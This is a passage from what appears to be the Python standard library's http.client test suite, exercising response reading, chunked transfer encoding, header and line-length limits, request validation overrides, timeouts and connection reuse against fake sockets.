body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(0), b'') # Issue #20007
self.assertFalse(resp.isclosed())
self.assertFalse(resp.closed)
self.assertEqual(resp.read(), b"Text")
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
self.assertRaises(client.BadStatusLine, resp.begin)
def test_bad_status_repr(self):
exc = client.BadStatusLine('')
self.assertEqual(repr(exc), '''BadStatusLine("''")''')
def test_partial_reads(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_mixed_reads(self):
# readline() should update the remaining length, so that read() knows
# how much data is left and does not raise IncompleteRead
body = "HTTP/1.1 200 Ok\r\nContent-Length: 13\r\n\r\nText\r\nAnother"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.readline(), b'Text\r\n')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(), b'Another')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_past_end(self):
# if we have Content-Length, clip reads to the end
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(10), b'Text')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_past_end(self):
# if we have Content-Length, clip readintos to the end
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(10)
n = resp.readinto(b)
self.assertEqual(n, 4)
self.assertEqual(bytes(b)[:4], b'Text')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
def test_partial_reads_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
def test_partial_readintos_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:80", "www.python.org", 80),
("www.python.org:", "www.python.org", 80),
("www.python.org", "www.python.org", 80),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b", 80)):
c = client.HTTPConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_response_headers(self):
# test response with multiple message headers with the same field name.
text = ('HTTP/1.1 200 OK\r\n'
'Set-Cookie: Customer="WILE_E_COYOTE"; '
'Version="1"; Path="/acme"\r\n'
'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
' Path="/acme"\r\n'
'\r\n'
'No body\r\n')
hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
', '
'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
s = FakeSocket(text)
r = client.HTTPResponse(s)
r.begin()
cookies = r.getheader("Set-Cookie")
self.assertEqual(cookies, hdr)
def test_read_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
if resp.read():
self.fail("Did not expect response from HEAD request")
def test_readinto_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
if resp.readinto(b) != 0:
self.fail("Did not expect response from HEAD request")
self.assertEqual(bytes(b), b'\x00'*5)
def test_too_many_headers(self):
headers = '\r\n'.join('Header%d: foo' % i
for i in range(client._MAXHEADERS + 1)) + '\r\n'
text = ('HTTP/1.1 200 OK\r\n' + headers)
s = FakeSocket(text)
r = client.HTTPResponse(s)
self.assertRaisesRegex(client.HTTPException,
r"got more than \d+ headers", r.begin)
def test_send_file(self):
expected = (b'GET /foo HTTP/1.1\r\nHost: example.com\r\n'
b'Accept-Encoding: identity\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n')
with open(__file__, 'rb') as body:
conn = client.HTTPConnection('example.com')
sock = FakeSocket(body)
conn.sock = sock
conn.request('GET', '/foo', body)
self.assertTrue(sock.data.startswith(expected), '%r != %r' %
(sock.data[:len(expected)], expected))
def test_send(self):
expected = b'this is a test this is only a test'
conn = client.HTTPConnection('example.com')
sock = FakeSocket(None)
conn.sock = sock
conn.send(expected)
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(array.array('b', expected))
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(io.BytesIO(expected))
self.assertEqual(expected, sock.data)
def test_send_updating_file(self):
def data():
yield 'data'
yield None
yield 'data_two'
class UpdatingFile(io.TextIOBase):
mode = 'r'
d = data()
def read(self, blocksize=-1):
return next(self.d)
expected = b'data'
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.send(UpdatingFile())
self.assertEqual(sock.data, expected)
def test_send_iter(self):
expected = b'GET /foo HTTP/1.1\r\nHost: example.com\r\n' \
b'Accept-Encoding: identity\r\nContent-Length: 11\r\n' \
b'\r\nonetwothree'
def body():
yield b"one"
yield b"two"
yield b"three"
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.request('GET', '/foo', body(), {'Content-Length': '11'})
self.assertEqual(sock.data, expected)
def test_blocksize_request(self):
"""Check that request() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.request("PUT", "/", io.BytesIO(expected), {"Content-Length": "9"})
self.assertEqual(sock.sendall_calls, 3)
body = sock.data.split(b"\r\n\r\n", 1)[1]
self.assertEqual(body, expected)
def test_blocksize_send(self):
"""Check that send() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.send(io.BytesIO(expected))
self.assertEqual(sock.sendall_calls, 2)
self.assertEqual(sock.data, expected)
def test_send_type_error(self):
# See: Issue #12676
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
with self.assertRaises(TypeError):
conn.request('POST', 'test', conn)
def test_chunked(self):
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(n) + resp.read(n) + resp.read(), expected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_readinto_chunked(self):
expected = chunked_expected
nexpected = len(expected)
b = bytearray(128)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
n = resp.readinto(b)
self.assertEqual(b[:nexpected], expected)
self.assertEqual(n, nexpected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
m = memoryview(b)
i = resp.readinto(m[0:n])
i += resp.readinto(m[i:n + i])
i += resp.readinto(m[i:])
self.assertEqual(b[:nexpected], expected)
self.assertEqual(i, nexpected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
n = resp.readinto(b)
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_readinto_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertEqual(bytes(b), b'\x00'*5)
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_negative_content_length(self):
sock = FakeSocket(
'HTTP/1.1 200 OK\r\nContent-Length: -1\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), b'Hello\r\n')
self.assertTrue(resp.isclosed())
def test_incomplete_read(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, b'Hello\r\n')
self.assertEqual(repr(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertEqual(str(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertTrue(resp.isclosed())
else:
self.fail('IncompleteRead expected')
def test_epipe(self):
sock = EPipeSocket(
"HTTP/1.0 401 Authorization Required\r\n"
"Content-type: text/html\r\n"
"WWW-Authenticate: Basic realm=\"example\"\r\n",
b"Content-Length")
conn = client.HTTPConnection("example.com")
conn.sock = sock
self.assertRaises(OSError,
lambda: conn.request("PUT", "/url", "body"))
resp = conn.getresponse()
self.assertEqual(401, resp.status)
self.assertEqual("Basic realm=\"example\"",
resp.getheader("www-authenticate"))
# Test lines overflowing the max line size (_MAXLINE in http.client)
def test_overflowing_status_line(self):
body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises((client.LineTooLong, client.BadStatusLine), resp.begin)
def test_overflowing_header_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises(client.LineTooLong, resp.begin)
def test_overflowing_chunked_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
+ '0' * 65536 + 'a\r\n'
'hello world\r\n'
'0\r\n'
'\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
resp.begin()
self.assertRaises(client.LineTooLong, resp.read)
def test_early_eof(self):
# Test httpresponse with no \r\n termination,
body = "HTTP/1.1 200 Ok"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_error_leak(self):
# Test that the socket is not leaked if getresponse() fails
conn = client.HTTPConnection('example.com')
response = None
class Response(client.HTTPResponse):
def __init__(self, *pos, **kw):
nonlocal response
response = self # Avoid garbage collector closing the socket
client.HTTPResponse.__init__(self, *pos, **kw)
conn.response_class = Response
conn.sock = FakeSocket('Invalid status line')
conn.request('GET', '/')
self.assertRaises(client.BadStatusLine, conn.getresponse)
self.assertTrue(response.closed)
self.assertTrue(conn.sock.file_closed)
def test_chunked_extension(self):
extra = '3;foo=bar\r\n' + 'abc\r\n'
expected = chunked_expected + b'abc'
sock = FakeSocket(chunked_start + extra + last_chunk_extended + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_missing_end(self):
"""some servers may serve up a short chunked encoding stream"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk) #no terminating crlf
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_trailers(self):
"""See that trailers are read and ignored"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# we should have reached the end of the file
self.assertEqual(sock.file.read(), b"") #we read to the end
resp.close()
def test_chunked_sync(self):
"""Check that we don't read past the end of the chunked-encoding stream"""
expected = chunked_expected
extradata = "extradata"
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata.encode("ascii")) #we read to the end
resp.close()
def test_content_length_sync(self):
"""Check that we don't read past the end of the Content-Length stream"""
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readlines_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readlines(2000), [expected])
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(2000), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readline_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readline(10), expected)
self.assertEqual(resp.readline(10), b"")
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 30\r\n\r\n' + expected*3 + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(20), expected*2)
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_response_fileno(self):
# Make sure fd returned by fileno is valid.
serv = socket.create_server((HOST, 0))
self.addCleanup(serv.close)
result = None
def run_server():
[conn, address] = serv.accept()
with conn, conn.makefile("rb") as reader:
# Read the request header until a blank line
while True:
line = reader.readline()
if not line.rstrip(b"\r\n"):
break
conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
nonlocal result
result = reader.read()
thread = threading.Thread(target=run_server)
thread.start()
self.addCleanup(thread.join, float(1))
conn = client.HTTPConnection(*serv.getsockname())
conn.request("CONNECT", "dummy:1234")
response = conn.getresponse()
try:
self.assertEqual(response.status, client.OK)
s = socket.socket(fileno=response.fileno())
try:
s.sendall(b"proxied data\n")
finally:
s.detach()
finally:
response.close()
conn.close()
thread.join()
self.assertEqual(result, b"proxied data\n")
def test_putrequest_override_domain_validation(self):
"""
It should be possible to override the default validation
behavior in putrequest (bpo-38216).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_path(self, url):
pass
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/\x00')
def test_putrequest_override_host_validation(self):
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_host(self, url):
pass
conn = UnsafeHTTPConnection('example.com\r\n')
conn.sock = FakeSocket('')
# set skip_host so a ValueError is not raised upon adding the
# invalid URL as the value of the "Host:" header
conn.putrequest('GET', '/', skip_host=1)
def test_putrequest_override_encoding(self):
"""
It should be possible to override the default encoding
to transmit bytes in another encoding even if invalid
(bpo-36274).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _encode_request(self, str_url):
return str_url.encode('utf-8')
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/☃')
class ExtendedReadTest(TestCase):
"""
Test peek(), read1(), readline()
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'\r\n'
'hello world!\n'
'and now \n'
'for something completely different\n'
'foo'
)
lines_expected = lines[lines.find('hello'):].encode("ascii")
lines_chunked = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
def setUp(self):
sock = FakeSocket(self.lines)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
resp.fp = io.BufferedReader(resp.fp)
self.resp = resp
def test_peek(self):
resp = self.resp
# patch up the buffered peek so that it returns not too much stuff
oldpeek = resp.fp.peek
def mypeek(n=-1):
p = oldpeek(n)
if n >= 0:
return p[:n]
return p[:10]
resp.fp.peek = mypeek
all = []
while True:
# try a short peek
p = resp.peek(3)
if p:
self.assertGreater(len(p), 0)
# then unbounded peek
p2 = resp.peek()
self.assertGreaterEqual(len(p2), len(p))
self.assertTrue(p2.startswith(p))
next = resp.read(len(p2))
self.assertEqual(next, p2)
else:
next = resp.read()
self.assertFalse(next)
all.append(next)
if not next:
break
self.assertEqual(b"".join(all), self.lines_expected)
def test_readline(self):
resp = self.resp
self._verify_readline(self.resp.readline, self.lines_expected)
def _verify_readline(self, readline, expected):
all = []
while True:
# short readlines
line = readline(5)
if line and line != b"foo":
if len(line) < 5:
self.assertTrue(line.endswith(b"\n"))
all.append(line)
if not line:
break
self.assertEqual(b"".join(all), expected)
def test_read1(self):
resp = self.resp
def r():
res = resp.read1(4)
self.assertLessEqual(len(res), 4)
return res
readliner = Readliner(r)
self._verify_readline(readliner.readline, self.lines_expected)
def test_read1_unbounded(self):
resp = self.resp
all = []
while True:
data = resp.read1()
if not data:
break
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_bounded(self):
resp = self.resp
all = []
while True:
data = resp.read1(10)
if not data:
break
self.assertLessEqual(len(data), 10)
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_0(self):
self.assertEqual(self.resp.read1(0), b"")
def test_peek_0(self):
p = self.resp.peek(0)
self.assertLessEqual(0, len(p))
class ExtendedReadTestChunked(ExtendedReadTest):
"""
Test peek(), read1(), readline() in chunked mode
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
class Readliner:
"""
a simple readline class that uses an arbitrary read function and buffering
"""
def __init__(self, readfunc):
self.readfunc = readfunc
self.remainder = b""
def readline(self, limit):
data = []
datalen = 0
read = self.remainder
try:
while True:
idx = read.find(b'\n')
if idx != -1:
break
if datalen + len(read) >= limit:
idx = limit - datalen - 1
# read more data
data.append(read)
read = self.readfunc()
if not read:
idx = 0 #eof condition
break
idx += 1
data.append(read[:idx])
self.remainder = read[idx:]
return b"".join(data)
except:
self.remainder = b"".join(data)
raise
class OfflineTest(TestCase):
def test_all(self):
# Documented objects defined in the module should be in __all__
expected = {"responses"} # White-list documented dict() object
# HTTPMessage, parse_headers(), and the HTTP status code constants are
# intentionally omitted for simplicity
blacklist = {"HTTPMessage", "parse_headers"}
for name in dir(client):
if name.startswith("_") or name in blacklist:
continue
module_object = getattr(client, name)
if getattr(module_object, "__module__", None) == "http.client":
expected.add(name)
self.assertCountEqual(client.__all__, expected)
def test_responses(self):
self.assertEqual(client.responses[client.NOT_FOUND], "Not Found")
def test_client_constants(self):
# Make sure we don't break backward compatibility with 3.4
expected = [
'CONTINUE',
'SWITCHING_PROTOCOLS',
'PROCESSING',
'OK',
'CREATED',
'ACCEPTED',
'NON_AUTHORITATIVE_INFORMATION',
'NO_CONTENT',
'RESET_CONTENT',
'PARTIAL_CONTENT',
'MULTI_STATUS',
'IM_USED',
'MULTIPLE_CHOICES',
'MOVED_PERMANENTLY',
'FOUND',
'SEE_OTHER',
'NOT_MODIFIED',
'USE_PROXY',
'TEMPORARY_REDIRECT',
'BAD_REQUEST',
'UNAUTHORIZED',
'PAYMENT_REQUIRED',
'FORBIDDEN',
'NOT_FOUND',
'METHOD_NOT_ALLOWED',
'NOT_ACCEPTABLE',
'PROXY_AUTHENTICATION_REQUIRED',
'REQUEST_TIMEOUT',
'CONFLICT',
'GONE',
'LENGTH_REQUIRED',
'PRECONDITION_FAILED',
'REQUEST_ENTITY_TOO_LARGE',
'REQUEST_URI_TOO_LONG',
'UNSUPPORTED_MEDIA_TYPE',
'REQUESTED_RANGE_NOT_SATISFIABLE',
'EXPECTATION_FAILED',
'IM_A_TEAPOT',
'MISDIRECTED_REQUEST',
'UNPROCESSABLE_ENTITY',
'LOCKED',
'FAILED_DEPENDENCY',
'UPGRADE_REQUIRED',
'PRECONDITION_REQUIRED',
'TOO_MANY_REQUESTS',
'REQUEST_HEADER_FIELDS_TOO_LARGE',
'UNAVAILABLE_FOR_LEGAL_REASONS',
'INTERNAL_SERVER_ERROR',
'NOT_IMPLEMENTED',
'BAD_GATEWAY',
'SERVICE_UNAVAILABLE',
'GATEWAY_TIMEOUT',
'HTTP_VERSION_NOT_SUPPORTED',
'INSUFFICIENT_STORAGE',
'NOT_EXTENDED',
'NETWORK_AUTHENTICATION_REQUIRED',
'EARLY_HINTS',
'TOO_EARLY'
]
for const in expected:
with self.subTest(constant=const):
self.assertTrue(hasattr(client, const))
class SourceAddressTest(TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(self.serv)
self.source_port = socket_helper.find_unused_port()
self.serv.listen()
self.conn = None
def tearDown(self):
if self.conn:
self.conn.close()
self.conn = None
self.serv.close()
self.serv = None
def testHTTPConnectionSourceAddress(self):
self.conn = client.HTTPConnection(HOST, self.port,
source_address=('', self.source_port))
self.conn.connect()
self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not defined')
def testHTTPSConnectionSourceAddress(self):
self.conn = client.HTTPSConnection(HOST, self.port,
source_address=('', self.source_port))
# We don't test anything here other than the constructor not barfing as
# this code doesn't deal with setting up an active running SSL server
# for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
PORT = None
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TimeoutTest.PORT = socket_helper.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
def testTimeoutAttribute(self):
# This will prove that the timeout gets through HTTPConnection
# and into the socket.
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
# no timeout -- do not use global socket default
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT,
timeout=None)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), None)
httpConn.close()
# a value
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
httpConn.connect()
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
class PersistenceTest(TestCase):
def test_reuse_reconnect(self):
# Should reuse or reconnect depending on header from server
tests = (
('1.0', '', False),
('1.0', 'Connection: keep-alive\r\n', True),
('1.1', '', True),
('1.1', 'Connection: close\r\n', False),
('1.0', 'Connection: keep-ALIVE\r\n', True),
('1.1', 'Connection: cloSE\r\n', False),
)
for version, header, reuse in tests:
with self.subTest(version=version, header=header):
msg = (
'HTTP/{} 200 OK\r\n'
'{}'
'Content-Length: 12\r\n'
'\r\n'
'Dummy body\r\n'
).format(version, header)
conn = FakeSocketHTTPConnection(msg)
self.assertIsNone(conn.sock)
conn.request('GET', '/open-connection')
with conn.getresponse() as response:
self.assertEqual(conn.sock is None, not reuse)
response.read()
self.assertEqual(conn.sock is None, not reuse)
self.assertEqual(conn.connections, 1)
conn.request('GET', '/subsequent-request')
self.assertEqual(conn.connections, 1 if reuse else 2)
def test_disconnected(self):
def make_reset_reader(text):
"""Return BufferedReader that raises ECONNRESET at EOF"""
stream = io.BytesIO(text)
def readinto(buffer):
size = io.BytesIO.readinto(stream, buffer)
if size == 0:
